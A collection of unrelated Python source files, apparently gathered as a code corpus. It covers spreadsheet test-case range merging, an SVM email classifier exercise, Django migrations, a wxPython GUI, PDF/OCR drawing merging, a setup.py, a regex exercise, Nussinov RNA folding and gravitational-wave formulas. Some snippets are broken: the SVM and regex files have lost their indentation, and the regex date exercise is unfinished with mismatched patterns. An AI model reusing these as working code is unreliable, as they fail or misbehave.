    if not str(sheet.cell(a, 2).value) == 'Test\xa0Analysis\xa0Item':
        a += 1
    else:
        break
#---------------------------------------------------------------------------------------------------
first_colum = 3
last_colum = number_colum_input
first_row = a
last_row = sheet.max_row
#------------------------------------------------------------------------------------------------------
sheet = wb['入出力データ分析表']
#sheet.cell(row, column).value
# Collect, per column, every third cell value from first_row down as one
# comma-separated string.
x = first_colum
y = first_row
z = ['']*(last_colum + 1)
temp_t = ['']*(last_colum + 1)
while x <= last_colum:
    while y <= last_row:
        z[x] = z[x] + ',' + str(sheet.cell(y, x).value)
        #print(temp_t[x])
        y += 3
    y = first_row
    x += 1
# De-duplicate each column's value list while preserving order.
array_t = ['']*(last_colum + 3)
a = 3
while a <= (last_colum):
    temp_t[a] = list(dict.fromkeys(z[a].split(',')))
    #temp_t[a] = temp_t[a].replace('None','')
    #my_array[a] = np.asarray(temp_t[a])
    #array_t[a].append(temp_t[a])
    #print(temp_t[a])
    a +=1
# Re-join the de-duplicated values back into comma-separated strings.
my_array = ['']*(last_colum + 3)
a = 3
while a <= (last_colum):
    for i in temp_t[a]:
        #my_array[a] = my_array[a].replace(',','')
        my_array[a] = my_array[a] + ',' + i
    a +=1
print('--------all test var input-----------')
print('\n')
# sort test case following max -> min
a_raw = array_testcase
c_raw = a_raw.split(',')
def sort_name(string):
    """Re-order the comma-separated names in *string* so they follow the
    global test-case order held in c_raw; returns the result without its
    leading separator."""
    ordered = ''
    if len(string) > 0:
        present = string.split(',')
        for name in c_raw:
            if name in present:
                ordered = ordered + ',' + name
    return(ordered[1:])
#-----------------------------------------------------------------------------------------
# Scrub each column's value string: collapse empty fields, drop 'None'
# placeholders, '#' markers and all whitespace.
a = 1
while a <= (last_colum):
    #my_array[a] = my_array[a].replace(',','')
    my_array[a] = my_array[a].replace(',,','')
    my_array[a] = my_array[a].replace(',None','')
    my_array[a] = my_array[a].replace('None','')
    my_array[a]= my_array[a]#.replace('-','')
    my_array[a]= my_array[a].replace('#','')
    #my_array[a] = str(a) + '\t' + my_array[a]
    my_array[a] = my_array[a].replace(' ','')
    my_array[a] = my_array[a].replace('\t','')
    my_array[a] = my_array[a].replace('\r','')
    my_array[a] = my_array[a].replace('\n','')
    a +=1
# Re-order each column's names to follow the global test-case order.
copy_tem_t = my_array.copy()
a = 1
while a <= (last_colum):
    my_array[a] = sort_name(copy_tem_t[a])
    my_array[a] = my_array[a].replace(',,','')
    my_array[a] = my_array[a].replace('-','')
    if a >= 3:
        print(a-2, '\t',my_array[a])
    a +=1
#---------------------------------------------------------
# collect, per record, the test-case NAME and its "start~end" RANGE
p = 0
string_copy_name = ['']*(line_of_test + 1)
string_copy_testcase = ['']*(line_of_test + 1)
string_temp = ''
while p < (line_of_test + 1):
    string_temp = string_result_1[p].split("$")
    #print(string_temp)
    if len(string_temp) >2:
        g = string_temp[2];
        # (disabled single-letter filter kept for reference)
        # if not (g == 'A' and g == 'B' and ... and g == 'Z'):
        string_copy_name[p] = string_temp[2].replace('-','')
        string_copy_name[p] = string_copy_name[p].replace('#','')
        string_copy_testcase[p] =string_temp[0].replace('-','') + '~' + string_temp[1].replace('-','')
        #string_copy_testcase[p] =string_temp[0] + '~' + string_temp[1]
        string_copy_testcase[p] = string_copy_testcase[p].replace('#','')
    p +=1
print('string_copy_name: ', string_copy_name)
print('string_copy_testcase: ', string_copy_testcase)
# Re-label test cases: replace every collected test-case NAME occurring in
# my_array with its "start~end" RANGE.  Names are substituted longest-first
# (minimum length 5 down to 1) so a short name never clobbers the middle of
# a longer one.  The original spelled this out as five copy-pasted while
# loops differing only in the length threshold; this collapses them into a
# single loop over the thresholds with identical behavior (including the
# fact that the membership test uses the column value as it was at the start
# of each per-column pass).
my_array_t = ['']*last_colum
for min_len in (5, 4, 3, 2, 1):
    a = 1
    while a <= (last_colum):
        i = my_array[a]
        b = 0
        while b <= (line_of_test - 1):
            p = string_copy_name[b]
            if (p in i):
                if len(p) >= min_len:
                    my_array[a] = my_array[a].replace(p, string_copy_testcase[b])
            b += 1
        a += 1
#-----------merge test case-----------
#a = '1~5,59~63,64~65,66~70,71~75,76~78,79~83,84~86,87~88,89~90,91~91,92~94,95~96,97~101, 222~256, 257~267, 277~277, 299~300'
#b =a.split(',')
def merger_modify(a):
    """Collapse adjacent "start~end" ranges in the comma-separated list *a*.

    Whenever one range ends exactly one before the next one starts, the two
    are fused by rewriting their shared boundary with '0' markers; the final
    replace() then splices the marked pairs together.  Returns the merged
    list WITH a leading comma (callers strip it), or '' for empty input.
    """
    if len(a) == 0:
        return('')
    parts = a.split(',')
    idx = 0
    while idx < (len(parts) - 1):
        left = parts[idx].split('~')
        right = parts[idx + 1].split('~')
        if (int(right[0]) - int(left[1])) == 1:
            # Mark both sides of the seam; '0,0~' is removed below.
            parts[idx] = left[0] + '~0'
            parts[idx + 1] = '0~' + right[1]
        idx += 1
    merged = ''
    for piece in parts:
        merged = merged + ',' + piece
    merged = merged.replace('0,0~', '')
    return(merged)
#-------------------------------------
# merge test case as 155~155
def merge_testcase_special(string):
    """Collapse degenerate ranges like '155~155' down to '155'.

    Strips all spaces first; returns '' for empty input.  Every item is
    expected to contain a '~' separator (as produced by merger_modify).
    """
    string = string.replace(' ', '')
    if len(string) == 0:
        return('')
    pieces = []
    for item in string.split(','):
        bounds = item.split('~')
        if bounds[0] == bounds[1]:
            pieces.append(bounds[0])
        else:
            pieces.append(bounds[0] + '~' + bounds[1])
    return(','.join(pieces))
#--------------------------
# Merge and simplify every column's test-case range list.
tt = ''
# NOTE(review): missing parentheses — this stores the bound method object,
# not a copy of the list.  The variable is unused afterwards, so behavior
# is unaffected, but confirm whether `.copy()` was intended.
array_result_t = my_array.copy
a = 1
while a <= (last_colum):
    tt = my_array[a]
    tt_t = merger_modify(tt)
    tt_t = tt_t[1:]
    my_array[a] = merge_testcase_special(tt_t)
    #print(my_array[a])
    a +=1
print('\n\n')
# join each variable (type + name) with its test-case ranges
a = 3
b = 3
while a <= (number_colum_input - 1):
    type_var[a] = type_var[a] + '\t' + my_array[b]
    #print(type_var[a])
    a +=1
    b +=1
print('\n\n')
print('--------total input var =', a-3, '----------')
print('\n\n')
# print points 1-2 of the new template
point_check = ['Number of elements', 'AMIN_return', 'AMOUT']
for k in point_check:
    print('-----------------------------', k, '-------------------------------')
    a = 3
    b = 0
    while a <= (number_colum_input - 1):
        if k in type_var[a]:
            print(type_var[a])
            b +=1
        a +=1
    print('-------------------total =--------',b , '--------------------------' )
    print('\n\n')
# Remaining columns are the plain input variables.
print('-----------------------------input variable-------------------------------')
a = 3
b = 0
while a <= (number_colum_input - 1):
    if (not('Number of elements' in type_var[a]) and (not 'AMIN_return' in type_var[a])):
        print(type_var[a])
        b +=1
    a +=1
print('-------------------total =--------',b , '--------------------------' )
print('\n\n')
#--------------------------
print('\n\n')
print('\n\n')
#p = 0
#while p < line_of_test:
#    print(p, '\t',string_copy[p])
#    p += 1
|
#!/usr/bin/python
"""
This is the code to accompany the Lesson 2 (SVM) mini-project.
Use a SVM to identify emails from the Enron corpus by their authors:
Sara has label 0
Chris has label 1
"""
import sys
from time import time
sys.path.append("../tools/")
from email_preprocess import preprocess
### features_train and features_test are the features for the training
### and testing datasets, respectively
### labels_train and labels_test are the corresponding item labels
features_train, features_test, labels_train, labels_test = preprocess()
# features_train = features_train[:len(features_train)/100]
# labels_train = labels_train[:len(labels_train)/100]
from sklearn import svm
from sklearn.metrics import accuracy_score
clf = svm.SVC(kernel = 'rbf',C = 10000)
t0 = time()
clf.fit(features_train, labels_train)
print "training time:", round(time()-t0, 3), "s"
t1 = time()
predict = clf.predict(features_test)
print "testing time:", round(time()-t0, 3), "s"
print accuracy_score(labels_test, predict)
print "10", predict[10]
print "26", predict[26]
print "50", predict[50]
count = 0
for i in predict:
if i == 1:
count = count + 1
print "Total", count
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    """Add Game.score_type (scoring scheme selector) and clarify the
    Player.is_active help text."""

    dependencies = [
        ('basketball', '0061_player_is_active'),
    ]

    operations = [
        # Nullable so existing Game rows need no default at migration time.
        migrations.AddField(
            model_name='game',
            name='score_type',
            field=models.CharField(choices=[('1and2', "1's and 2's"), ('2and3', "2's and 3's")], max_length=30, null=True),
        ),
        migrations.AlterField(
            model_name='player',
            name='is_active',
            field=models.BooleanField(default=True, help_text='Determine if a player should be selectable when creating games'),
        ),
    ]
|
# -*- coding: utf-8 -*-
import wx
import ukbiobank
class M_AM_B(wx.Frame, ukbiobank.ukbio):
    # NOTE(review): this class is assigned below as a Python-2-style
    # __metaclass__, but it derives from wx.Frame rather than type, so it is
    # not a valid metaclass; under Python 3 the attribute is ignored anyway.
    # Confirm whether this class is still needed.
    pass
class SelectVariablesFrame(wx.Frame, ukbiobank.ukbio):
    """Checkbox window listing every UKB field name; the checked subset is
    handed back to the parent MenuFrame when Submit is pressed."""

    # NOTE(review): __metaclass__ is Python-2 syntax and has no effect under
    # Python 3 (which this code targets, given the bare super().__init__()).
    __metaclass__ = M_AM_B

    def __init__(self, parent, ukb):
        """Build the checklist UI and show the frame.

        Args:
            parent: window that receives the selections via selectionsSetter.
            ukb: loaded ukbio object whose field names populate the list.
        """
        super().__init__(parent=parent, title="UKBiobank-tools checkbox")
        panel = wx.Panel(self)
        my_sizer = wx.BoxSizer(wx.VERTICAL)
        # Variables checkbox
        self.checkbox = wx.CheckListBox(
            panel, choices=ukbiobank.utils.utils.getFieldnames(ukb)
        )
        # Description
        desc = wx.TextCtrl(
            panel, value="Select desired variables", style=wx.TE_READONLY
        )
        # Submit button; the default-argument binding freezes the current
        # ukb value for the callback.
        submit = wx.Button(panel, label="Submit")
        submit.Bind(wx.EVT_BUTTON, lambda evt, ukb=ukb: self.submit(evt, parent, ukb))
        my_sizer.Add(desc, 1, wx.CENTER | wx.EXPAND)
        my_sizer.Add(self.checkbox, 1, wx.EXPAND)
        my_sizer.Add(submit, 1, wx.EXPAND)
        panel.SetSizer(my_sizer)
        self.Show()

    # set selections
    def submit(self, event, parent, ukb):
        """Push the checked variable names to the parent, then hide."""
        selections = {}
        selections["include_variables"] = list(self.checkbox.GetCheckedStrings())
        # Setting selections, passing through parent MenuFrame
        parent.selectionsSetter(arg1=selections)
        self.Hide()
        return
|
import PyPDF2
import pytesseract
import os
import sys
from pdf2image import convert_from_path
from PIL import Image
from datetime import datetime
from configparser import ConfigParser
import shutil
settings_file = os.path.abspath(os.path.dirname(sys.argv[0])) + "\\settings.ini"
def check_create_dir(order_number):
    """Ensure the order's data folder exists and move temp drafts into it.

    Reads the order_data and draft_temp paths from settings.ini, creates
    <order_data>/<order_number>/DFT when missing, then moves every file
    from the draft temp folder into that DFT folder.
    """
    # Read setting.ini file
    Config = ConfigParser()
    Config.read(settings_file)
    order_path = os.path.join(Config.get("PATH SETTINGS", "order_data"),order_number)
    temp_draft = Config.get("PATH SETTINGS", "draft_temp")
    draft_path = os.path.join(order_path, "DFT")
    # Check if folder exists, if not create folder (and its DFT subfolder)
    if not os.path.exists(order_path):
        os.makedirs(order_path)
        os.makedirs(draft_path)
    # Move draft files to new folder
    # NOTE(review): this move also runs when the folders already existed;
    # confirm that re-running for an existing order is intended.
    for drawing in os.listdir(temp_draft):
        old_path = os.path.join(temp_draft,drawing)
        new_path = os.path.join(draft_path, drawing)
        shutil.move(old_path, new_path)
def split_to_sam(order_number):
    """Split the combined work-order PDF into one PDF per SAM.

    Scans <order_number>.pdf for pages containing the job ID (SAM cover
    pages), writes each SAM page plus up to two trailing non-SAM pages to
    the order folder, and extracts the part name and article number from
    each cover page's text.

    Returns:
        list of [savePath, samID, partName, artNr] entries, one per SAM.
        (The original left this return commented out, so combine_files
        received None and crashed when iterating the order data.)
    """
    # Define file
    file = order_number + ".pdf"
    # Open combined WO pdf
    pdfFile = open(file, 'rb')
    pdfReader = PyPDF2.PdfFileReader(pdfFile)
    # Job ID = file name without its extension.  The original used
    # file.strip('.pdf'), which strips CHARACTERS, mangling any order number
    # that begins or ends with 'p', 'd', 'f' or '.'.
    jobID = os.path.splitext(file)[0]
    # initialize sam counter
    samID = 0
    # Total number of pages
    n_pages = pdfReader.numPages
    # create list for order data and samPages
    orderData = []
    samPages = []
    # A page whose text mentions the job ID is a SAM cover page.
    for i in range(n_pages):
        page = pdfReader.getPage(i)
        pageText = page.extractText()
        if jobID in pageText:
            samPages.append(i)
    # Loop through the file and save each SAM as its own PDF.
    for i in range(n_pages):
        pdfWriter = PyPDF2.PdfFileWriter()
        if i in samPages:
            pdfWriter.addPage(pdfReader.getPage(i))
            # Get part name from the cover page text.
            pageText = pdfReader.getPage(i).extractText()
            newLines = []
            n_letter = 0
            # Record the offsets of the first two newlines in the text.
            for line in pageText:
                n_letter += 1
                if line == "\n" and len(newLines) < 2:
                    newLines.append(n_letter)
            # Cut from the first newline up to "Omschrijving" (description).
            partName = pageText[newLines[0] : pageText.find("Omschrijving")]
            # Cut from after "Artikelnummer:" up to the second newline.
            artStr = pageText[pageText.find("Artikelnummer:") + 14 : newLines[1]]
            # Keep only the digits of the article number.
            artNr = ""
            for char in artStr:
                if char.isdigit():
                    artNr += char
            # Append up to two following non-SAM pages (drawings etc.).
            for j in range(1,3):
                if i + j not in samPages and i + j < n_pages:
                    pdfWriter.addPage(pdfReader.getPage(i + j))
                else:
                    break
            # Read setting.ini file for the destination folder.
            Config = ConfigParser()
            Config.read(settings_file)
            path = os.path.join(Config.get("PATH SETTINGS", "order_data"), jobID)
            # Define save path
            saveName = str(jobID) + ' SAM ' + str(samID) + '.pdf'
            savePath = os.path.join(path, saveName)
            # Save PDF
            samPDF = open(savePath,'wb')
            pdfWriter.write(samPDF)
            samPDF.close()
            # Record [filename, samID, partName, artNr] for this SAM.
            partData = [savePath, samID, partName, artNr]
            orderData.append(partData)
            samID += 1
    return orderData
def get_drawing_data(drawing):
    """OCR the article number out of a drawing PDF's title block.

    Renders the drawing at 300 dpi, crops the title-block region (whose
    position depends on portrait vs landscape orientation) and runs
    Tesseract on the crop.

    Returns:
        str: the recognized article number with all whitespace removed.
    """
    # Script path
    path = os.path.abspath(os.path.dirname(sys.argv[0]))
    # get user name
    user = os.getlogin()
    # Tesseract executable
    pytesseract.pytesseract.tesseract_cmd = 'C:/Users/'+ user +'/AppData/Local/Tesseract-OCR/tesseract.exe'
    # Path to Poppler.  The original joined with a leading '/', which makes
    # os.path.join DISCARD the script path and yield '/poppler-0.68.0/bin'.
    poppler_path = os.path.join(path, 'poppler-0.68.0', 'bin')
    # Open combined WO pdf
    with open(drawing, 'rb') as pdfFile:
        pdfReader = PyPDF2.PdfFileReader(pdfFile)
        # NOTE(review): `page` is unused; kept so the PDF is still validated
        # by actually reading its first page.
        page = pdfReader.getPage(0)
    # Convert to image and crop the title-block region.
    images = convert_from_path(drawing, dpi=300, poppler_path=poppler_path)
    for image in images:
        left, upper, right, lower = image.getbbox()
        if right < lower:
            # Portrait title block
            temp_img = image.crop(((right - 1020), (lower - 300), (right - 380), (lower - 220)))
        else:
            # Landscape title block
            temp_img = image.crop(((right - 970), (lower - 240), (right - 350), (lower - 155)))
    # OCR the crop and remove all whitespace from the result.
    artNr = ''.join(pytesseract.image_to_string(temp_img).split())
    # Return article number from drawing
    return artNr
def combine_files(order_number):
    """Merge each work-order (SAM) PDF with its matching drawing PDF.

    Every drawing in <order_data>/<order_number>/DFT is OCR'd for its article
    number via get_drawing_data(); each work order produced by split_to_sam()
    is then matched against those article numbers (>= 90% positional character
    agreement) and the first matching drawing is appended to the work-order
    PDF in place.

    Parameters
    ----------
    order_number : str
        Order (job) identifier; also the sub-directory name under order_data.

    Returns
    -------
    str
        Human-readable summary (elapsed time and number of drawings found).
    """
    # Map article number (from OCR) -> drawing path
    drawingData = {}
    lastTime = datetime.now()
    # Read setting.ini file
    Config = ConfigParser()
    Config.read(settings_file)
    dftDir = os.path.join(Config.get("PATH SETTINGS", "order_data"), order_number, "DFT")
    count = 0
    # Run get_drawing_data on files in dir
    for drawing in os.listdir(dftDir):
        drawingPath = os.path.join(dftDir, drawing)
        artNr_dft = get_drawing_data(drawingPath)
        drawingData[artNr_dft] = drawingPath
        count += 1
    # Create WO PDF's and get orderData
    orderData = split_to_sam(order_number)
    # Minimum fraction of matching characters to accept a pairing
    match = 0.9
    for order in orderData:
        artNr_wo = order[3][:-4]
        wo_pdf = str(order[0])
        pdfMerger = PyPDF2.PdfFileMerger()
        # Scan the drawings once and merge the first sufficiently similar
        # article number. BUG FIX: the old `while foundPair == False` loop
        # never terminated when no drawing matched, and kept merging further
        # matches within the same scan.
        for key in drawingData:
            keyStr = key[:-4]
            # Count positionally matching characters over the shorter string
            counter = 0
            for i in range(min(len(artNr_wo), len(keyStr))):
                if artNr_wo[i] == keyStr[i]:
                    counter += 1
            if counter > len(artNr_wo) * match:
                # Merge WO + drawing and overwrite the WO file in place;
                # context managers close the source handles deterministically.
                with open(wo_pdf, 'rb') as wo_fp, open(drawingData[key], 'rb') as dft_fp:
                    pdfMerger.append(PyPDF2.PdfFileReader(wo_fp))
                    pdfMerger.append(PyPDF2.PdfFileReader(dft_fp))
                    pdfMerger.write(wo_pdf)
                break
    # BUG FIX: `currentTime` was referenced below but its assignment had been
    # commented out, raising NameError at runtime.
    currentTime = datetime.now()
    # Time formatting
    time_delta = currentTime - lastTime
    # finish string
    finish_string = f'Program executed in {time_delta} seconds. \n{count} drawings combined'
    return finish_string
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2018-11-13 02:17
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Schema-only migration: drop the `project_status` column from the
    `project` model (follows 0006_auto_20181113_0914)."""

    dependencies = [
        ('project', '0006_auto_20181113_0914'),
    ]

    operations = [
        # Irreversible data loss for the removed column on forward migration
        migrations.RemoveField(
            model_name='project',
            name='project_status',
        ),
    ]
|
"""setup.py for cryptarchive"""
from setuptools import setup
setup(
name="cryptarchive",
version="0.1.6",
author="bennr01",
author_email="benjamin99.vogt@web.de",
description="encrypted storage server and client",
long_description=open("README.md").read(),
license="AGPLv3",
keywords="crypto server data storage network CLI",
url="https://github.com/bennr01/cryptarchive/",
classifiers=[
"License :: OSI Approved :: GNU Affero General Public License v3",
"Topic :: Security :: Cryptography",
"Programming Language :: Python",
"Development Status :: 3 - Alpha",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
],
packages=[
"cryptarchive",
],
install_requires=[
"twisted",
"pycryptodome",
"zope.interface",
],
entry_points={
"console_scripts": [
"cryptarchive-server=cryptarchive.runner:server_main",
"cryptarchive-client=cryptarchive.runner:client_main",
],
}
)
|
import re
import os
## setting working directory ------------------------------------------------
os.chdir("C:/Users/wooki/Documents/GitHub/pythoncourse2018/day06")
# open text file of 2008 NH primary Obama speech
with open("obama-nh.txt", "r") as f:
text = f.readlines()
## TODO: print lines that do not contain 'the' using what we learned
## (although you ~might~ think you could do something like
## [l for l in obama if "the" not in l]
key=re.compile(r"\b[Tt]he\b")
key=re.compile(r"\bThe|the\b")
keyword = re.compile(r"\sthe\s")
keyword2 = re.compile(r"The\w+")
l=[]
for line in (text):
if keyword.search(line) or keyword2.search(line):
the = line
else:
nothe = line
print nothe
l.append(nothe)
len(l)
# TODO: print lines that contain a word of any length starting with s and ending with e
# Lower-case every line first so a single lower-case pattern covers all lines.
text2 = [x.lower() for x in text]
key = re.compile(r"\bs[a-z]*e\b")
# Keep exactly the lines in which the pattern occurs at least once.
find = [line for line in text2 if key.search(line)]
find
len(find)
## TODO: Print the date input in the following format
## Month: MM
## Day: DD
## Year: YY
date = raw_input("Please enter a date in the format MM.DD.YY: ")
Month = re.compile(r"\d{1,2}/\d{1,2}")
Day = re.compile(r"\d{1,2}/\d{1,2}")
Year = re.compile(r"\d{1,2}/\d{1,2}")
date =raw_input("Please enter a date in the format MM.DD.YY: ") |
# author: Christopher Koch
# date: 05/18/2015
# file: Nussinov.py
#
# topic: RNA, Bioinformatics, dynamic programming, recursion
# decription: the nussinov-algorithm was invented by Ruth Nussinov and it is used to predict RNA secondary structure.
def comparable(a, b):
    """Return 1 when nucleotides a and b form a Watson-Crick pair
    (A-U, U-A, C-G or G-C), otherwise 0."""
    watson_crick = (('A', 'U'), ('U', 'A'), ('C', 'G'), ('G', 'C'))
    return 1 if (a, b) in watson_crick else 0
def printMatrix(s, m):
    """Pretty-print the Nussinov DP matrix m for sequence s.

    Python 2 print statements; the trailing commas suppress the newline so
    each row is emitted as one tab-separated line.
    """
    # header row: the sequence characters as column labels
    print '\t\t',
    for i in range(0, len(m)-1):
        print '\t' + s[i],
    print
    # matrix body: row index, the cell values, then the row's sequence char
    for i in range(1, len(m[0])):
        print '\t' + str(i),
        for j in range(len(m[i])):
            print '\t' + str(m[i][j]),
        print '\t' + s[i-1]
    # footer row: column indices
    print '\t',
    for i in range(0, len(m)):
        print '\t' + str(i),
    print
    print
def createMatrix(s):
    """Return a fresh (len(s)+1) x (len(s)+1) matrix filled with ' '
    placeholders, sized for 1-based DP indexing over sequence s."""
    size = len(s) + 1
    return [[' '] * size for _ in range(size)]
def initMatrix(m_p):
    """Zero the main diagonal and the sub-diagonal of m_p in place and
    return the same matrix object.

    Note: for row 0 the sub-diagonal write is m[0][-1], i.e. the last
    column of the first row -- behaviour preserved from the original.
    """
    for idx in range(len(m_p)):
        m_p[idx][idx] = 0
        m_p[idx][idx - 1] = 0
    return m_p
def calculateMatrix(m_p, m_l):
    """Fill the Nussinov DP matrix diagonal by diagonal (in place) and
    return it.

    m_p: matrix prepared by initMatrix; m_l: minimum loop length between
    paired positions.
    NOTE(review): reads the module-global sequence `_s` instead of taking it
    as a parameter -- confirm before reusing this function elsewhere.
    """
    m = m_p
    # c is the offset of the diagonal currently being filled (j = i + c)
    c = 0
    for x in range(1, len(m)):
        for y in range(1, len(m)):
            i = y
            j = y + c
            if j > len(m)-1:
                break
            # case 1: position j stays unpaired
            a = m[i][j-1]
            b = 0
            # case 2: j pairs with some k in [i, j - m_l)
            for k in range(i, j-m_l):
                # sub 1 because the real indexes of _s starts with 0
                if(comparable(_s[k-1], _s[j-1])):
                    b = max(b, m[i][k-1] + m[k+1][j-1] + 1)
            m[i][j] = max(a, b)
        c += 1
    return m
def traceback(s, m, i, j, t, m_l):
    """Recursively recover one optimal set of base pairs from the filled
    Nussinov matrix m for sequence s.

    i, j: 1-based bounds of the window currently examined; t: accumulator
    list that [k, j] pair entries are appended to (mutated in place and
    also returned); m_l: minimum loop length.
    """
    if j == i:
        # empty window: nothing left to pair
        return t
    elif m[i][j] == m[i][j-1]:
        # j was left unpaired: step one position to the left
        traceback(s, m, i, j-1, t, m_l)
        return t
    else:
        # find a k that j was paired with, then recurse into both sub-windows
        for k in range(i, j-m_l):
            if(comparable(s[k-1], s[j-1])):
                if m[i][j] == m[i][k-1] + m[k+1][j-1] + 1:
                    t.append([k, j])
                    traceback(s, m, i, k-1, t, m_l)
                    traceback(s, m, k+1, j-1, t, m_l)
                    # NOTE(review): implicitly returns None when no k matches;
                    # should not happen for a consistently filled matrix
                    return t
def printStructure(s, t):
    """Print the sequence s and, underneath it, dot-bracket notation for the
    traceback pairs t ('(' opens a pair, ')' closes it, '.' is unpaired).

    Python 2 print statements; trailing commas keep each row on one line.
    """
    # first row: the sequence characters
    print '\t\t',
    for i in range(1, len(s)+1):
        print '\t' + str(s[i-1]),
    print
    # second row: bracket/dot per position, derived from the pair list
    print '\t\t',
    for i in range(1, len(s)+1):
        a = '\t.'
        for j in range(len(t)):
            if i == t[j][0]:
                a = '\t('
            elif i == t[j][1]:
                a = '\t)'
        print a,
def nussinov(s, m_l):
    """Run the full Nussinov pipeline for sequence s with minimum loop
    length m_l: build, initialise and fill the DP matrix, print it, then
    trace back and print the predicted secondary structure."""
    # build and initialise the DP matrix in one go
    matrix = initMatrix(createMatrix(s))
    # fill it diagonal by diagonal
    matrix = calculateMatrix(matrix, m_l)
    printMatrix(s, matrix)
    # recover one optimal pairing and show it in dot-bracket form
    pairs = traceback(s, matrix, 1, len(matrix) - 1, [], m_l)
    printStructure(s, pairs)
_s = "GCACGACG"
nussinov(_s, 0)
|
#!/usr/bin/python
import numpy as np
import pylab as py
from scipy import integrate
from COMMON import nanosec,yr,week,grav,msun,light,mpc,hub0,h0,omm,omv,kpc,mchirpfun,fmaxlso
#I will plot the formulas from DrozEtAl1999 with redshift, and see if the extra terms in the stationary phase approximation explain the amplification for pulsar timing.
#Input parameters:
redsi=1.  #Redshift of the source binary.
#PTAs: frequency band typical of pulsar-timing arrays.
fmin=1./(10.*yr)  #Lowest observable frequency (10-year baseline).
fbin=fmin*0.1  #Frequency-grid resolution.
fmax=10**(-7)  #Highest frequency considered, in Hz.
mchi=10**(10.)*(1.+redsi) #Redshifted chirp mass, in solar masses.
'''
#GBDs:
fmin=10.
fmax=1000.
fbin=0.1
mchi=2*(1.+redsi) #Redshifted chirp mass, in solar masses.
'''
phic=0.  #Phase at coalescence.
minreds=1e-3 #Minimum redshift considered.
maxreds=1e2 #Maximum redshift considered.
zbin=1000 #Number of z-bins.
#-----------------------------------------------------------------
#Deriving some quantities.
#-----------------------------------------------------------------
#Defining some functions.
def ht(Qang, mch, dist, f, fmin, fmax, phi):
    '''Frequency-domain strain including the finite-band correction terms
    daw/dphiw on top of the stationary-phase result (presumably the
    corrected formula of DrozEtAl1999 -- TODO confirm equation number).'''
    return ht_spa(Qang, mch, dist, f, phi)*(1.+daw(mch, f, fmin, fmax))*np.cos(dphi(mch, f)+dphiw(mch, f, fmin, fmax))
def ht_spa(Qang, mch, dist, f, phi):
    '''Amplitude of the GW strain in the frequency domain (h tilde), under the stationary phase approximation,
    modulated by cos(phi).  dist is in Mpc; mch in solar masses.'''
    return np.sqrt(30.*np.pi)/24.*Qang*(grav*msun*mch)**2./(dist*mpc*light**(3./2.)*vorb(mch, f)**(7./2.))*np.cos(phi)
def Qang():
    '''Function of the angles mentioned in the paper.
    NOTE(review): placeholder returning 1 -- the correct angular factor is
    still to be determined (see author's +++ note below).'''
    return 1.#+++I have to find out the correct factor!
def vorb(mch, f):
    '''Characteristic velocity-like PN parameter v = (pi G M f)^(1/3) built
    from the chirp mass mch (solar masses) and frequency f -- units depend
    on the COMMON constants; TODO confirm.'''
    return (np.pi*grav*msun*mch*f)**(1./3.)
def phi(tc, phic, mch, f):
    '''Stationary-phase GW phase at frequency f, for coalescence time tc and
    coalescence phase phic (leading-order term; TODO confirm vs. paper).'''
    return 2.*np.pi*f*tc-phic-np.pi/4.+3.*light**5./(128.*vorb(mch, f)**5.)
def daw(mch, f, fmin, fmax):
    '''Relative amplitude correction arising from the finite frequency
    window [fmin, fmax] (oscillatory edge terms; TODO confirm vs. paper).'''
    return -12./np.sqrt(30.*np.pi)*(vorb(mch, f)*1./light)**(7./2.)*( vorb(mch, fmin)**2.*light/(vorb(mch, f)**3.-vorb(mch, fmin)**3.)*np.cos(philim(mch, f, fmin)+np.pi/4.) + vorb(mch, fmax)**2.*light/(-vorb(mch, f)**3.+vorb(mch, fmax)**3.)*np.cos(philim(mch, f, fmax)+np.pi/4.) )
def philim(mch, f, flim):
    '''Phase evaluated at a band edge flim, used inside the daw/dphiw
    window-correction terms (TODO confirm vs. paper).'''
    return (5.*vorb(mch, f)**3.-8.*vorb(mch, flim)**3.)*light**5./(128.*vorb(mch, flim)**8.)+3.*light**5./(128.*vorb(mch, f)**5.)
def dphiw(mch, f, fmin, fmax):
    '''Phase correction from the finite frequency window [fmin, fmax]
    (sine counterpart of daw; TODO confirm vs. paper).'''
    return 12./np.sqrt(30.*np.pi)*(vorb(mch, f)*1./light)**(7./2.)*( vorb(mch, fmin)**2.*light/(vorb(mch, f)**3.-vorb(mch, fmin)**3.)*np.sin(philim(mch, f, fmin)+np.pi/4.) + vorb(mch, fmax)**2.*light/(-vorb(mch, f)**3.+vorb(mch, fmax)**3.)*np.sin(philim(mch, f, fmax)+np.pi/4.))
def dphi(mch, f):
    '''Additional phase term proportional to vorb^5 (TODO confirm vs. paper).'''
    return 92./45.*vorb(mch, f)**5.
def tcoal(mch, f):
    '''Time to coalescence from frequency f, for chirp mass mch.

    Uses equal component masses m1 = m2 = 2^(1/5) so that the chirp mass of
    the pair is 2^(1/5)*... -- presumably chosen so fmaxlso gives the
    last-stable-orbit cutoff for this system; TODO confirm.'''
    m1=2**(1./5.)
    m2=m1
    # cutoff frequency at the last stable orbit (from COMMON.fmaxlso)
    fcoal=fmaxlso(m1, m2)
    cons=96./5.*np.pi**(8./3.)*(grav*msun*mch)**(5./3.)/(light**5.)
    return 3./(8.*cons)*(f**(-8./3.)-fcoal**(-8./3.))
#In principle I will just take a look at the amplitude:
def ht_amp(Qang, mch, dist, f, fmin, fmax):
    '''Amplitude-only version of ht: stationary-phase amplitude times the
    finite-window correction factor (1 + daw), no phase modulation.'''
    return ht_spa_amp(Qang, mch, dist, f)*(1.+daw(mch, f, fmin, fmax))
def ht_spa_amp(Qang, mch, dist, f):
    '''Amplitude of the GW strain in the frequency domain (h tilde), under the stationary phase approximation
    (same as ht_spa without the cos(phi) modulation).'''
    return np.sqrt(30.*np.pi)/24.*Qang*(grav*msun*mch)**2./(dist*mpc*light**(3./2.)*vorb(mch, f)**(7./2.))
#-----------------------------------------------------------------
#Creating a vector of redshift and a vector of luminosity and comoving distance.
reds=np.logspace(np.log10(minreds),np.log10(maxreds),zbin) #Vector of redshifts logarithmically spaced.
lumdistvec=np.zeros(len(reds)) #This will be D_L(z), the luminosity distance, in Mpc.
comdistvec=np.zeros(len(reds)) #This will be r(z), the comoving distance, in Mpc.
dist_const=light/(hub0*h0)/mpc #A constant that multiplies distances.
